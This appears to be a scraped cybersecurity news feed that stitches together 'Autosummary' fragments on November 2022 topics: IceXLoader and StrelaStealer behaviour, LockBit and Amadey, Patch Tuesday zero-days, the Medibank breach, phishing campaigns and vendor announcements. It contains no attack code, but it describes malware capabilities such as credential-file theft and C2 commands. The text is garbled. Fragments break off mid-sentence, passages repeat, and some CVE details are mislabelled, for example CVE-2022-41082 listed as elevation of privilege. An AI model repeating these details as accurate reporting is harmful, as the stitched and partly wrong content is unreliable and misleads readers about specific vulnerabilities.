PowerShell commands to disable AV and add exemptions (Minerva Labs) The commands supported by the loader are the following: Stop execution Collect system info and exfiltrate to C2 Display dialog box with specified message Restart IceXLoader Send GET request to download a file and open it with “cmd/ C” Send GET request to download an executable to run it from memory Load and execute a .NET assembly Change C2 server beaconing interval Update IceXLoader Remove all copies from the disk and stop running Minerva reports that the threat actors behind this campaign aren’t interested in securing the stolen data, as the SQLite database holding stolen information is accessible in the C2 address. "Autosummary:
Mark of the Web propagated to files inside an ISO Source: BleepingComputer Two other MoTW bugs fixed In addition to fixing ISO MoTW propagation, the November updates also fixed two MoTW bugs discovered and reported by Will Dormann, a senior vulnerability analyst at ANALYGENCE, with one actively exploited in the wild by threat actors. "Armis partners with non-profit NextGen Cyber Talent to help develop the next generation of cybersecurity professionals. NextGen Cyber Talent is on a mission to successfully educate cohorts of underprivileged and underserved students about cyber technologies and address the talent shortage by providing students with professional development enabling them to pursue careers in cybersecurity. Armis is supporting the non-profit by offering certified classes for students taught by Armis team members and by furthering the organization’s impact … More
The post Armis and NextGen Cyber Talent join forces to address the shortage of cybersecurity experts appeared first on Help Net Security.
"Autosummary:
“We need to recognize and address that not only on days like today – National STEM/STEAM Day, which draws attention to the importance of providing education on and cultivating talent across science, technology, engineering, art, and mathematics – but on an ongoing basis to make a real difference. "Autosummary:
" The list of actively exploited vulnerabilities, which allow privilege elevation and remote code execution, is as follows - CVE-2022-41040 (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell) CVE-2022-41082 (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell) CVE-2022-41128 (CVSS score: 8.8) - "SonicWall released the 2022 SonicWall Threat Mindset Survey which found that 66% of customers are more concerned about cyberattacks in 2022, with the main threat being focused on financially motivated attacks like ransomware. This Help Net Security video provides information from a survey on how organizations are keeping pace with the fast-moving threat landscape, as they orient their business, networks, data and employees against unwavering cyberattacks.
The post Ransomware is the biggest concern for most organizations appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned. Amadey Bot is a data-stealing malware that was first spotted in 2018, it also allows […]
The post Experts observed Amadey malware deploying LockBit 3.0 Ransomware appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Microsoft Patch Tuesday updates for November 2022 addressed 64 vulnerabilities, including six actively exploited zero-days. Microsoft Patch Tuesday updates for November 2022 addressed 64 new vulnerabilities in Microsoft Windows and Windows Components; Azure and Azure Real Time Operating System; Microsoft Dynamics; Exchange Server; Office and Office Components; SysInternals; Visual Studio; SharePoint Server; Network Policy Server […]
The post Microsoft Patch Tuesday updates fix 6 actively exploited zero-days appeared first on Security Affairs.
"Autosummary:
The following vulnerabilities are actively exploited: CVE-2022-41028 – Microsoft Exchange Server Remote Code Execution Vulnerability CVE-2022-41040 – Microsoft Exchange Server Elevation of Privilege Vulnerability CVE-2022-41128 – Windows Scripting Languages Remote Code Execution Vulnerability CVE-2022-41091 – Windows Mark of the Web Security Feature Bypass Vulnerability CVE-2022-41073 – Windows Print Spooler Elevation of Privilege Vulnerability CVE-2022-41125 – Windows CNG Key Isolation Service Elevation of Privilege Vulnerability “These vulnerabilities affect Exchange Server. "Autosummary:
The data Medibank believes was exposed in last month"s breach includes the following: Name, date of birth, address, phone number, and email address for approximately 9.7 million current and former customers and authorized representatives Medicare numbers (but not expiry dates) for ahm health insurance (ahm) customers Passport numbers (but not expiry dates) and visa details for international student customers Health claims data for roughly 480,000 Medibank, ahm, and international customers Health provider details, including names, provider numbers, and addresses However, according to Medibank "given the nature of this crime, unfortunately we now believe that all of the customer data accessed could have been taken by the criminal. "Autosummary:
"Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits. Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that have been exploited by a surveillance company. The three issues are: The researchers pointed out that the surveillance firm included in its spyware the […]
The post Surveillance vendor exploited Samsung phone zero-days appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnWhen in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.” concludes the report. "Finite State has hired Larry Pesce as its Product Security Research and Analysis Director. Pesce will serve as a senior consultant, providing expert guidance and services to product security teams worldwide, including product security program design and development, product red-teaming and penetration testing, software supply chain risk management, and vulnerability management. Recent research from the Ponemon Institute indicates that six of every ten organizations find it increasingly difficult to quickly respond to new vulnerability disclosures … More
The post Finite State hires Larry Pesce as Product Security Research and Analysis Director appeared first on Help Net Security.
"Autosummary:
"Bugcrowd announced the appointment of Dave Gerry as Chief Executive Officer (CEO). As CEO, Gerry will oversee operations, drive growth and profitability, and manage the company’s overall strategy. This appointment follows another year of rapid growth for the company, which has experienced record customer adoption of its crowdsourced cybersecurity solutions and represents the next step in Bugcrowd’s global expansion strategy. Bugcrowd partners with hundreds of clients including: CISA/Department of Homeland Security, BigCommerce, Monash University, TX … More
The post Bugcrowd appoints Dave Gerry as CEO appeared first on Help Net Security.
"Autosummary:
“From our inception, the mission of the Bugcrowd platform has been to connect the latent potential of the good-faith hacker community with cybersecurity’s unmet demands—unlocking an army of allies to outsmart an army of adversaries,” said Casey Ellis, Founder, Chairperson, and CTO. "Autosummary:
The lure document opened by StrelaStealer Source: DCSO CyTec StrelaStealer details Upon execution, StrelaStealer searches the "%APPDATA%\Thunderbird\Profiles\" directory for "logins.json" (account and password) and "key4.db" (password database) and exfiltrates their contents to the C2 server. "Emotet, one of the most evasive and destructive malware delivery systems, caused substantial damage during its initial reign. After a coordinated takedown by authorities in early 2021, Emotet has reemerged as a global threat that will persist for organizations. In this Help Net Security video, Chad Skipper, Global Security Technologist at VMware, unpacks insights learned from Emotet’s most recent resurgence in hopes that organizations can better understand and defend themselves against this resilient malware.
The post Exposing Emotet and its cybercriminal supply chain appeared first on Help Net Security.
"Autosummary:
"ENISA, EU’s Agency for Cybersecurity, released its annual Threat Landscape report, covering the period from July 2021 up to July 2022. Cybersecurity threat landscape in 2022 With more than 10 terabytes of data stolen monthly, ransomware still fares as one of the prime threats in the new report with phishing now identified as the most common initial vector of such attacks. The other threats to rank highest along ransomware are attacks against availability also called … More
The post How geopolitical turmoil changed the cybersecurity threat landscape appeared first on Help Net Security.
"Autosummary:
Ransomware : 60% of affected organizations may have paid ransom demands : 60% of affected organizations may have paid ransom demands Malware : 66 disclosures of zero-day vulnerabilities observed in 2021 : 66 disclosures of zero-day vulnerabilities observed in 2021 Social engineering : Phishing remains a popular technique but we see new forms of phishing arising such as spear-phishing, whaling, smishing and vishing : Phishing remains a popular technique but we see new forms of phishing arising such as spear-phishing, whaling, smishing and vishing Threats against data : Increasing in proportionally to the total of data produced : Increasing in proportionally to the total of data produced Disinformation – misinformation :Escalating AI-enabled disinformation, deepfakes and disinformation-as-a-service Supply chain targeting : Third-party incidents account for 17% of the intrusions in 2021 compared to less than 1% in 2020 : Third-party incidents account for 17% of the intrusions in 2021 compared to less than 1% in 2020 Threats against availability : : Largest denial of service (DDoS) attack ever was launched in Europe in July 2022 Internet: destruction of infrastructure, outages and rerouting of internet traffic. "Cybercriminals are getting craftier as auto retailers continue to fall victim to well-disguised cyberattacks. According to the second annual dealership cybersecurity study by CDK Global, 15% of dealers have experienced a cybersecurity incident in the past year. This Help Net Security video reveals what steps auto retailers are taking to get ready for an increase in potential infrastructure attacks.
The post Auto retailers are falling victim to sophisticated phishing appeared first on Help Net Security.
"Autosummary:
"Australian health insurer Medibank confirmed that personal data belonging to around 9.7 million current and former customers were exposed as a result of a ransomware attack. Medibank announced that personal data belonging to around 9.7M of current and former customers were exposed as a result of a recent ransomware attack. Medibank is one of the […]
The post Medibank confirms ransomware attack impacting 9.7M customers, but doesn’t pay the ransom appeared first on Security Affairs.
"Autosummary:
This figure represents around 5.1 million Medibank customers, around 2.8 million ahm customers and around 1.8 million international customers Medicare numbers (but not expiry dates) for ahm customers Passport numbers (but not expiry dates) and visa details for international student customers Health claims data for around 160,000 Medibank customers, around 300,000 ahm customers and around 20,000 international customers. "Android users are often advised to get mobile apps from Google Play, the company’s official app marketplace, to minimize the possibility of downloading malware. After all, Google analyzes apps before allowing them on the market. Unfortunately, time after time, we read about malware peddlers finding ways around that vetting process. “Distribution through droppers on official stores remains one of the most efficient ways for threat actors to reach a wide and unsuspecting audience. Although other … More
The post Malicious droppers on Google Play deliver banking malware to victims appeared first on Help Net Security.
"Autosummary:
Evasion techniques of malware droppers on Google Play These trojanized, functional apps – usually file managers, file recovery tools, or security (2FA) authenticators – are crafted to conceal their malicious nature from Google Play Protect, antivirus solutions, researchers, and users: they provide the advertized functionality, request few common permissions that don’t raise suspicion, and don’t contain overtly malicious code. "Autosummary:
"Autosummary:
" The newest clipper malware offers support for a variety of wallets like Bitcoin, Ethereum, Bitcoin Cash, Litecoin, Dogecoin, Monero, Ripple, Zcash, Dash, Ronin, TRON, Cardano, Cosmos, Tezos, Qtum, and Steam Trade URL. "Researchers observed a SmokeLoader campaign that is distributing a new clipper malware dubbed Laplas Clipper that targets cryptocurrency users. Cyble researchers uncovered a SmokeLoader campaign that is distributing community malware, such as SystemBC and Raccoon Stealer 2.0, along with a new clipper malware tracked as Laplas. The experts detected more than 180 different samples of the clipper […]
The post SmokeLoader campaign distributes new Laplas Clipper malware appeared first on Security Affairs.
"Autosummary:
This clipper can target multiple wallets, including Bitcoin, Ethereum, Bitcoin Cash, Litecoin, Dogecoin, Monero, Ripple, ZCash, Dash, Ronin, Tron, and Steam Trade URL. "Autosummary:
"Autosummary:
Thread to track issue follows: — Kevin Beaumont (@GossiTheDog) September 29, 2022 Admins warned to patch Today, as part of the November 2022 Patch Tuesday, Microsoft finally released security updates to address the two vulnerabilities. "Autosummary:
The number of bugs in each vulnerability category is listed below: 27 Elevation of Privilege Vulnerabilities 4 Security Feature Bypass Vulnerabilities 16 Remote Code Execution Vulnerabilities 11 Information Disclosure Vulnerabilities 6 Denial of Service Vulnerabilities 3 Spoofing Vulnerabilities The above counts do not include two OpenSSL vulnerabilities disclosed on November 2nd. The six actively exploited zero-day vulnerabilities fixed in today"s updates are: CVE-2022-41128 - Windows Scripting Languages Remote Code Execution Vulnerability discovered by Clément Lecigne of Google’s Threat Analysis Group "This vulnerability requires that a user with an affected version of Windows access a malicious server. "November 2022 Patch Tuesday is here, with fixes for many vulnerabilities actively exploited in the wild, including CVE-2022-41091, a Windows Mark of the Web bypass flaw, and the ProxyNotShell MS Exchange vulnerabilities. Fixes to prioritize CVE-2022-41091 is a Windows zero-day vulnerability that allows attackers to bypass the Mark of the Web (MOTW) security feature. They can craft a malicious file triggering the flaw and deliver it either via a malicious or compromised website or via … More
The post Microsoft fixes many zero-days under attack appeared first on Help Net Security.
"Autosummary:
November 2022 Patch Tuesday is here, with fixes for many vulnerabilities actively exploited in the wild, including CVE-2022-41091, a Windows Mark of the Web bypass flaw, and the ProxyNotShell MS Exchange vulnerabilities. "Autosummary:
The payloads are again dropped in TEMP as one of the following three: %TEMP%\1000018041\dd.ps1 %TEMP%\1000019041\cc.ps1 %TEMP%\1000020001\LBB.exe From there, LockBit encrypts the user"s files and generates ransom notes demanding payment, threatening to publish stolen files on the group"s extortion site. "In this Help Net Security video, Tonia Dudley, VP, CISO at Cofense, provides a look at the various changes seen in the phishing threat landscape. Dudley talks about the impact of credential phishing and business email compromise (BEC), which allow cybercriminals to steal substantial amounts of money from global organizations.
The post Phishing threats are increasingly convincing and evasive appeared first on Help Net Security.
"Autosummary:
"Recently, the Forgepoint team announced a new alliance with global banking leader Santander to increase cyber investment worldwide, specifically in Europe, Israel, and Latin America. Santander will also be the primary investor in Forgepoint’s next fund, slated for 2023, with a nearly $300 million goal. This was the perfect reason to connect with Alberto Yépez, the co-founder and Managing Director of Forgepoint Capital. In this Help Net Security interview, the former Trident Capital leader offers … More
The post Taking cybersecurity investments to the next level appeared first on Help Net Security.
"Autosummary:
Large market opportunity Differentiated offerings that are hard to replicate Sound go-to-market strategy Ensuring the right team is in place Product market fit as demonstrated by early customer traction Israeli and European companies trying to get funding in the US should be able to clearly speak to these fundamentals, demonstrating how they’ll incorporate the US into their go-to-market and growth plans as they partner with investors, form channel alliances, and further develop their businesses.Networking with VCs may also suggest you meet with others and while these introductions may not be directly about fundraising, they can help you get exposure to potential customers, team members, and advisors for input on your tech, business, and model.In this Help Net Security interview, the former Trident Capital leader offers insight into innovation in the cybersecurity market, M&A activity, pitching to VCs, and more. "Researchers uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the victims. Microsoft’s Dynamics 365 Customer Voice product allows organizations to gain customer feedback, it is used to conduct customer satisfaction surveys. Researchers from cybersecurity firm Avanan, uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the […]
The post Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks appeared first on Security Affairs.
"Autosummary:
Below are the suggestions provided by the experts: Always hover all URLs, even those not in the email body When receiving an email with a voicemail, ensure this is a typical type of email received before thinking of engaging If ever unsure about an email, ask the original sender Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, phishing) "Autosummary:
"Australian health insurance provider Medibank has announced it won’t be paying the ransom to the criminal(s) who stole data of 9.7 million of its current and former customers. “Based on the extensive advice we have received from cybercrime experts we believe there is only a limited chance paying a ransom would ensure the return of our customers’ data and prevent it from being published. In fact, paying could have the opposite effect and encourage the … More
The post Medibank won’t pay the ransom for data stolen in breach appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The complete rundown of data Medibank believes was exposed in the breach includes the following: Name, date of birth, address, phone number, and email address for approximately 9.7 million current and former customers and authorized representatives Medicare numbers (but not expiry dates) for ahm health insurance (ahm) customers Passport numbers (but not expiry dates) and visa details for international student customers Health claims data for roughly 480,000 Medibank, ahm, and international customers Health provider details, including names, provider numbers, and addresses Medibank added that it also believes the cybercriminals behind the October attack have not gained access to financial information (credit card and banking details), primary identity documents (e.g., driver"s licenses), or health claims data for extras services (like dental, physio, optical and psychology). "Autosummary:
Last month attackers stole the personal details (including names, addresses, dates of birth, and phone numbers) of approximately 9.7 million current and former customers. "Autosummary:
"The phishing-as-a-service (PhaaS) platform Robin Banks migrated its infrastructure to DDoS-Guard, a Russian bulletproof hosting service. The phishing-as-a-service (PhaaS) platform Robin Banks was originally hosted by Cloudflare provider, but the company in July disassociated Robin Banks phishing infrastructure from its services after being informed. The move caused a multi-day disruption to PhaaS operations, then the administrators […]
The post Robin Banks phishing-as-a-service platform continues to evolve appeared first on Security Affairs.
"Autosummary:
“Robin Banks’ heavy reliance on open-source code and off-the-shelf tooling showcases just how low the barrier-to-entry is to not only conducting phishing attacks, but also to becoming a service provider and creating a PhaaS platform for others to use. Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"The outage is creating some operational and service disruptions that vary by business unit, plant, and site," reads the statement. "Autosummary:
"This works in a loop, so wiped file structure would look like this: 666 bytes of garbage, 666 bytes original, 666bytes of garbage, 666 bytes original, etc…" Corrupting data in alternating 666 bytes of data Source: Jiří Vinopal To make matters even worse, the data wiper will infect, or "backdoor," other 64-bit executables on the Windows device whose file path does not contain the following strings: :\Windows \ProgramData\ \cache2\entries \Low\Content. "At the end of October, a cyber attack caused the trains to stop in Denmark, the attack hit a third-party IT service provider. A cyber attack caused training the trains operated by DSB to stop in Denmark the last weekend, threat actors hit a third-party IT service provider. The attack hit the Danish company Supeo […]
The post A cyberattack blocked the trains in Denmark appeared first on Security Affairs.
"Autosummary:
"The ransomware group LockBit claimed to have stolen data from consulting and IT services provider Kearney & Company. Kearney is the premier CPA firm that services across the financial management spectrum to government entities. The company provides audit, consulting and IT services to the United States government. It has helped the Federal Government improve its […]
The post LockBit 3.0 gang claims to have stolen data from Kearney & Company appeared first on Security Affairs.
"Autosummary:
"Microsoft warns of an uptick among threat actors increasingly using publicly-disclosed zero-day exploits in their attacks. According to the Digital Defense Report published by Microsoft, threat actors are increasingly leveraging publicly-disclosed zero-day vulnerabilities to target organizations worldwide. The researchers noticed a reduction in the time between the announcement of a vulnerability and the commoditization of […]
The post Zero-day are exploited on a massive scale in increasingly shorter timeframes appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Preventative medicine has long been recognized as a vital approach in safeguarding our physical health. We take a variety of tests and assessments so that doctors can uncover key biological markers that may indicate the potential development of certain diseases or illnesses as early as possible. Cybercrime in the digital world has distinguishing features, too, and we can react to cyberattacks by neutralizing the source. As phishing attacks soar in frequency and sophistication and are … More
The post Outmaneuvering cybercriminals by recognizing mobile phishing threats’ telltale markers appeared first on Help Net Security.
"Autosummary:
This makes sense: Smartphones are our main connection to our digital endpoints – social media, email, apps, SMS, etc. – and the sophistication of today’s phishing criminals means that even the most switched on and savvy users can fall prey to attacks.However, this takes time and a major shift in mindset, so more than anything we need to deploy a technology, that can do the detection, decoding, and everything in between. "Bishop Fox collected and analyzed publicly disclosed reports from January to July 2022 to better understand the most frequently reported vulnerability types, the highest-disclosed bounties, and more. In this Help Net Security video, Carlos Yanez, Security Consultant at Bishop Fox, talks about the most frequently reported vulnerability types and severities.
The post The most frequently reported vulnerability types and severities appeared first on Help Net Security.
"Autosummary:
"Axiomtek has released the iNA200, a DIN-rail cybersecurity gateway for operational technology (OT) network security. The iNA200 is powered by the Intel Atom x6212RE or x6414RE processor (Elkhart Lake) and has one DDR4-3200 SO-DIMM for up to 32GB of system memory. For demanding rugged environments, this fanless IIoT edge gateway comes with a wide operating temperature range of -40°C to 70°C and supports wide power input of 9 to 36 VDC with dual power input. … More
The post Axiomtek iNA200 protects OT assets against malware and cyber-attacks appeared first on Help Net Security.
"Autosummary:
More I/O options include one HDMI, two USB 3.0 ports, one COM port (RS-232/422/485) with DB9 type, one COM port (RS-485) with 3 pin terminal block, one tact switch, four antenna holes, one power input connector, and one console port (RJ-45). "Autosummary:
Other than receiving a blue tick following successful verification, paid users are expected to get "priority in replies, mentions & search," fewer ads, and will be able to post longer multimedia content: You will also get: - Priority in replies, mentions & search, which is essential to defeat spam/scam - Ability to post long video & audio - Half as many ads — Elon Musk (@elonmusk) November 1, 2022 Following Musk"s tweets, BleepingComputer observed newer phishing campaigns emerging with threat actors now targeting verified accounts. "Autosummary:
"Attackers are abusing Microsoft Dynamics 365 Customer Voice to evade email filters and deliver phishing emails into Microsoft users’ inboxes, Avanan researchers are warning. The attack Microsoft Dynamics 365 is a suite of enterprise resource planning (ERP) and customer relationship management (CRM) applications. Customer Voice is one of these applications, and it’s used for collecting data and feedback from customers via surveys, phone calls, etc. The attackers have created Microsoft Dynamics 365 Customer Voice accounts … More
The post Attackers leverage Microsoft Dynamics 365 to phish users appeared first on Help Net Security.
"Autosummary:
Similarly, phishers have been known to exploit Facebook Ads, QuickBooks, Lucidchart, Adobe Cloud, and many other legitimate services. "Autosummary:
The latest attack chain is not the first time the threat actor has set its sights on Kavach (meaning "armor" in Hindi), a mandatory app required by users with email addresses on the @gov.in and @nic.in domains to sign in to the email service as a second layer of authentication. "Autosummary:
Robin Banks faced operational disruption in July 2022, when researchers at IronNet exposed the platform as a highly threatening phishing service targeting Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, Santander, Lloyds Bank, and the Commonwealth Bank. "This week"s news offered fresh reminders of the threat that ransomware poses for businesses and critical infrastructure worldwide
The post Ransomware rages on – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"While most organizations have insurance in case of cyberattacks, the premium they pay depends on how the business identifies, detects and responds to these attacks – and on how quickly they recover. Organizations that can prove their resiliency and compliance with NIS guidelines – showing that they will be able to recover quickly in the event of an attack – could reduce their risks and their insurance premiums. A great cybersecurity recovery program can save … More
The post Cybersecurity recovery is a process that starts long before a cyberattack occurs appeared first on Help Net Security.
"Autosummary:
An ever-evolving threat Organizations are racing to stay ahead of cyber criminals, and as a result, we see businesses investing a lot of money on identifying and detecting attacks, on preventing attacks in the first place, and in responding to live attacks.Having the right IT architecture, security and recovery process in place Organizations with the right IT architecture, recovery time and point objectives, and security policies are at a considerable advantage when it comes to the recovery process. "Bitdefender unveiled a real-time chat protection capabilities for mobile-based instant messaging applications. Bitdefender Chat Protection immediately alerts users if malicious links are received or sent during live sessions over the world’s most popular chat applications including WhatsApp, Facebook Messenger, Telegram and Discord. A true industry innovation, the new capabilities help protect users from increased cybercriminal activities targeting mobile devices. Chat Protection is incorporated into Bitdefender Mobile Security for Android through Bitdefender Scam Alert technology, used … More
The post Bitdefender Chat Protection defends users from cybercriminal activities targeting mobile devices appeared first on Help Net Security.
"Autosummary:
Chat Protection is incorporated into Bitdefender Mobile Security for Android through Bitdefender Scam Alert technology, used by consumers worldwide for monitoring, detecting and stopping link-based attacks delivered via messaging applications, notifications, and SMS text messages. "Azul has released Azul Vulnerability Detection, a new SaaS product that continuously detects known security vulnerabilities that exist in Java applications. By eliminating false positives and with no performance impact, Azul Vulnerability Detection is ideal for in-production use and addresses the increasing enterprise risk around software supply chain attacks. According to Gartner, “by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021” (Gartner, Emerging Tech: … More
The post Azul Vulnerability Detection uncovers known vulnerabilities in Java applications appeared first on Help Net Security.
"Autosummary:
According to Gartner, “by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021” (Gartner, Emerging Tech: A Software Bill of Materials is Critical to Software Supply Chain Management, Mark Driver, September 6, 2022). "Nucleus Security has launched the CISA KEV Enrichment Dashboard, a free tool that enables vulnerability researchers to observe known and exploitable vulnerabilities identified by CISA and layer additional enrichment intelligence onto their vulnerability prioritization. The CISA KEV Vulnerability Enrichment Dashboard provides a list of the CISA Known Exploitable Vulnerabilities (KEV) Catalog, which is then enriched with CVSS, EPSS and GreyNoise Threat Intelligence. There are approximately 198,000 known critical vulnerabilities and exposures (CVE), of which only … More
The post Nucleus Security CISA KEV Enrichment Dashboard provides insights into vulnerability prioritization appeared first on Help Net Security.
"Autosummary:
Through their research, and the development of the CISA KEV Enrichment Dashboard, Nucleus Security has made the following observations as of October 2022: Most exploited vendors The top five most exploited vendors on the CISA KEV list include Microsoft, Adobe, Cisco, Apple and Google, making up more than 53% of all vendors included. "In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about IoT devices cybersecurity, from production to usage, and how far have we come to securing these devices. IoT has been part of our reality for quite some time, but what about the security of these devices? Is it becoming a priority? We’ve seen the concern and prioritization of IoT security growing, this is due both to the growing popularity of these … More
The post IoT cybersecurity is slowly gaining mainstream attention appeared first on Help Net Security.
"Autosummary:
In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about IoT devices cybersecurity, from production to usage, and how far have we come to securing these devices.That said, we see a shift to making security a key component of the entire development process so that the approach is systematic, predictable, and scalable with the usual development schedule. "Autosummary:
A 2022 Mandiant report explained that FIN7 was working with various ransomware gangs, including Maze, Ryuk, Darkside, and BlackCat/ALPHV, apparently carrying out the initial compromise. "Autosummary:
"OPERA1ER often operates during weekends and public holidays," Group-IB said in a report shared with The Hacker News, adding the adversary"s "entire arsenal is based on open-source programs and trojans, or free published RATs that can be found on the dark web." This includes off-the-shelf malware such as Nanocore, Netwire, Agent Teslam Venom RAT, BitRAT, Metasploit, and Cobalt Strike Beacon, among others. "Sentinel Labs found evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7. Security researchers at Sentinel Labs shared details about Black Basta‘s TTPs and assess it is highly likely the ransomware operation has ties with FIN7. The experts analyzed tools used by the ransomware gang in attacks, some of […]
The post Experts link the Black Basta ransomware operation to FIN7 cybercrime gang appeared first on Security Affairs.
"Autosummary:
The report details Black Basta’s initial access activity, manual reconnaissance, lateral movements, privilege escalation techniques, and remote admin tools.Furthermore, we assess it is likely that the developer(s) behind their tools to impair victim defenses is, or was, a developer for FIN7.” concludes the report. "Autosummary:
The project cost $1.4 billion, making it the world’s most expensive ground telescope, and it was developed thanks to a multi-national effort involving the United States, Europe, Canada, Japan, South Korea, Taiwan, and Chile. "Autosummary:
The emails warn users that their "Verified" status - a coveted blue and white tick badge displayed alongside their name - will have to be paid for on a monthly basis, unless they can "fully verify [they are] famous or well-known. "To mark Antimalware Day, we’ve rounded up some of the most pressing issues for cybersecurity now and in the future
The post The future starts now: 10 major challenges facing cybersecurity appeared first on WeLiveSecurity
"Autosummary:
Monitoring the dark web helps cyber-defenders prevent attacks, understand how fraudsters and cybercriminal groups think, what vulnerabilities are being traded, what malicious tools the bad actors use to access organizations’ systems or to defraud people, or what information about an organization is circulating in these underground markets. One variety of phishing that has seen explosive growth lately is so-called callback phishing, a tactic that combines traditional email-based phishing with voice-based phishing (aka vishing) and is used to gain access to organizations’ systems and deploy malware, such as ransomware, on their networks. To get an idea of the general interest in the world of cryptocurrencies, NFT, play-to-earn games and others, just take a look at platforms such as PhishTank and notice the number of new phishing sites that are spotted daily and are designed to steal people’s credentials for cryptocurrency wallets. "Threat actors compromised a media company to deliver FakeUpdates malware through the websites of hundreds of newspapers in the US. Researchers at Proofpoint Threat Research observed threat actor TA569 intermittently injecting malicious code on a media company that serves many major news outlets. The media company serves The media company provides video content and advertising […]
The post 250+ U.S. news sites spotted spreading FakeUpdates malware in a supply-chain attack appeared first on Security Affairs.
"Autosummary:
Impacted media organizations serve: Boston New York Chicago Miami Washington, DC Cincinnati Palm Beach and include other national news outlets — Threat Insight (@threatinsight) November 2, 2022 Visitors of compromised websites were infected with malware payloads masqueraded as fake browser updates (i.e. Chromе.Uрdatе.zip, Chrome.Updater.zip, Firefoх.Uрdatе.zip, Operа.Updаte.zip, Oper.Updte.zip). "Autosummary:
" Fake KeePass website pushing RomCom RAT (BlackBerry) The ZIP file contains several files, including the "hlpr.dat," which is the RomCom RAT dropper, and "setup.exe," which launches the dropper. "Autosummary:
Continental entry on Lockbit"s data leak site (BleepingComputer) Breached in an August cyberattack Continental"s VP of Communications & Marketing, Kathryn Blackwell, didn"t confirm LockBit"s claims and would not share any details regarding the attack when BleepingComputer reached out but, instead, linked to a press release from August 24 regarding a cyberattack that led to a breach of Continental"s systems. "Autosummary:
The emails have attachments that deliver the first-stage malware, among them Netwire, bitrat, venomRAT, AgentTesla, Remcos, Neutrino, BlackNET, and Venom RAT. "Cybertech NYC 2022 will host more than 70 cybersecurity startups at the Javits Center in New York City on November 15-16. The event will also feature global cyber leaders from Israel, France, Spain, Finland, United Arab Emirates, and more. Oleh Derevianko, Chairman, and CVO of Information System Security Partners in Ukraine, will offer his perspective on the cybersecurity angle of the war with Russia. Derevianko’s presentation is one of more than 20 sessions discussing various … More
The post Cybertech NYC 2022 to feature 70+ cybersecurity startups appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Once Qakbot obtains a persistent foothold in the target environment, the Black Basta operator enters the scene to conduct reconnaissance by connecting to the victim through the backdoor, followed by exploiting known vulnerabilities (e.g., ZeroLogon, PrintNightmare, and NoPac) to escalate privileges. "The LockBit ransomware group claimed to have hacked the multinational automotive group Continental and threatens to leak stolen data. LockBit ransomware gang announced to have hacked the German multinational automotive parts manufacturing company Continental. The group added the name of the company to its Tor leak site and is threatening to publish alleged stolen data if the […]
The post LockBit ransomware gang claims the hack of Continental automotive group appeared first on Security Affairs.
"Autosummary:
"32% of CISOs or IT Security DMs in the UK and US are considering leaving their current organization, according to a research from BlackFog. Of those considering leaving their current role, a third of those would do so within the next six months. This research, which explored the frustrations and challenges faced by cybersecurity professionals also highlights the impact that cyber incidents have on turnover and job security. It revealed that of those who had … More
The post 32% of cybersecurity leaders considering quitting their jobs appeared first on Help Net Security.
"Autosummary:
The struggle to keep up with new cybersecurity approaches Escalating cybersecurity threats are driving new innovations to help organizations improve their cybersecurity posture, however, findings show: 52%, admitted that they are struggling to keep up to date with new frameworks and models such as zero trust. "In this interview for Help Net Security, Mike Lefebvre, Director of Cybersecurity at SEI, talks about the hierarchy of cybersecurity needs and what should be done to meet them properly. We have all heard about the hierarchy of human needs, but what about the hierarchy of cybersecurity needs? What does it consist of? A hierarchy of cybersecurity needs is inspired by a similar concept of the hierarchy of human needs, coined by the psychologist Abraham … More
The post Meet fundamental cybersecurity needs before aiming for more appeared first on Help Net Security.
"Autosummary:
Examples of this include servers, endpoints, clouds, printers, applications, third-party vendors, IoT devices, identities and anything-as-a-service.Examples of this include servers, endpoints, clouds, printers, applications, third-party vendors, IoT devices, identities and anything-as-a-service.Just as the hierarchy of human needs posits that we need to consistently have food, shelter, and water to achieve higher order actualization (e.g., belonging, religion, self-esteem), so too do we need to regularly meet foundational cyber needs. "Dropbox has suffered a data breach, but users needn’t worry because the attackers did not gain access to anyone’s Dropbox account, password, or payment information. Instead, they grabbed code from 130 of the company’s private repositories hosted on GitHub. What was compromised? The compromised repositories contain “copies of third-party libraries slightly modified for use by Dropbox, internal prototypes, and some tools and configuration files used by the security team” – but not code for Dropbox … More
The post 130 Dropbox code repos plundered after successful phishing attack appeared first on Help Net Security.
"Autosummary:
